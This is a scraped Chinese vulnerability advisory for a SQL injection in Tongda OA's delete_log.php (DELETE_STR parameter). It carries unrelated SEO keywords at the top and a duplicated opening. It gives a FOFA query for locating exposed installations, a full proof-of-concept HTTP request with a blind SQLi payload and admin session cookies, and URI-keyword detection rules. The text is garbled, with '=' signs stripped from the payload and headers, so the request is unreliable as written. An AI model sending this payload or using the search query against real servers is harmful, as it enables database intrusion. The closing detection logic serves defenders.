建站大师,石家庄百度推广开户,腾讯企业邮箱pc版入口,wordpress改wp admin1、漏洞描述 通达OA中发现一个漏洞#xff0c;并被列为严重漏洞。该漏洞影响文件general/system/seal_manage/dianju/delete_log.php的未知代码。对参数 DELETE_STR 的操作会导致 sql 注入。
2、影响范围 通达OA版本11.10之前
3、复现环境 FOFA搜索#xff1a;appTDX…1、漏洞描述 通达OA中发现一个漏洞并被列为严重漏洞。该漏洞影响文件general/system/seal_manage/dianju/delete_log.php的未知代码。对参数 DELETE_STR 的操作会导致 sql 注入。
2、影响范围 通达OA版本11.10之前
3、复现环境 FOFA搜索appTDXK-通达OA icon_hash-759108386发现漏洞网站
4、POC
GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR1) and (substr(DATABASE(),2,1))char(68) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)(1 HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
Cookie: PHPSESSID4n867pmrrp4nendg0tsngl7g70; USER_NAME_COOKIEadmin; OA_USER_IDadmin; SID_1c74d7ebb
Connection: close
5、检测思路 -数据源Web访问流量日志 -检测逻辑 -and: -uri 包含 ‘/general/system/seal_manage/dianju/delete_log.php?DELETE_STR’ -uri 包含 from -or: -uri 包含 select -uri 包含 delete -uri 包含 update
